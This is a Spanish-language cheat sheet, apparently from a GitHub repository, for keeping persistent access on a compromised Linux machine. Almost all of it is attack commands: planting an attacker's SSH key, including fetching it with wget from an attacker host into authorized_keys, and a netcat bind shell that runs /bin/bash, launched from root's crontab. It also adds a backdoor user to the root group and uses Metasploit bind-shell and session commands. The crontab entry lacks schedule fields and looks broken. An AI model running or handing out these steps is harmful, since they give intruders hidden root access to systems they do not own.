Skip to content

Latest commit

 

History

History
95 lines (71 loc) · 1.74 KB

File metadata and controls

95 lines (71 loc) · 1.74 KB

Obteniendo Persistencia en Linux

Malicious SSH Key [ con credenciales ]

Generación de par de claves

ssh-keygen -t rsa -b 4096

# En caso de que se solicite una contraseña tenemos la opción de dejarlo en blanco

Tranferencia de la clave pública al usuario comprometido

ssh-copy-id <victim-user>@<target-ip-or-hostname>

# Se solicitará la contraseña del usuario

Conexión con SSH

ssh <victim-user>@<target-ip-or-hostname>

Malicious SSH Key [ sin credenciales ]

Generación de par de claves

ssh-keygen -t rsa -b 4096

# En caso de que se solicite una contraseña tenemos la opción de dejarlo en blanco

Inicialización de servidor Python

cd ~/.ssh/

python3 -m http.server 80

# Alternativa con Python2.7
python2 -m SimpleHTTPServer 80

Descargar archivo [ máquina atacante ]

wget http://<attacker-ip>/id_rsa.pub

cat id_rsa.pub >> .ssh/authorized_keys

Malicious Crontab

Creación de bindshell

echo 'nc -lkvnp 4443 -e /bin/bash >/dev/null &' > /tmp/bindshell

Creación de crontab maliciosa

echo '     /tmp/bindshell' | sudo tee -a /var/spool/cron/crontabs/root

New User

Creación de nuevo usuario

adduser -m user -s /bin/bash ftp

Cambio de contraseña

passwd ftp

Agregar el usuario a grupo root

usermod -aG root ftp

Extra

Obteniendo conexión con Bindshell

use payload/generic/shell_bind_tcp

set RHOST <target-ip>

set LPORT <local-port>

exploit

Obteniendo conexión con Bindshell

# CTRL + Z o escribe 'background' para poner la sesión previamente obtenida en segundo plano

sessions -l

sessions -u <session-id>

sessions <session-id>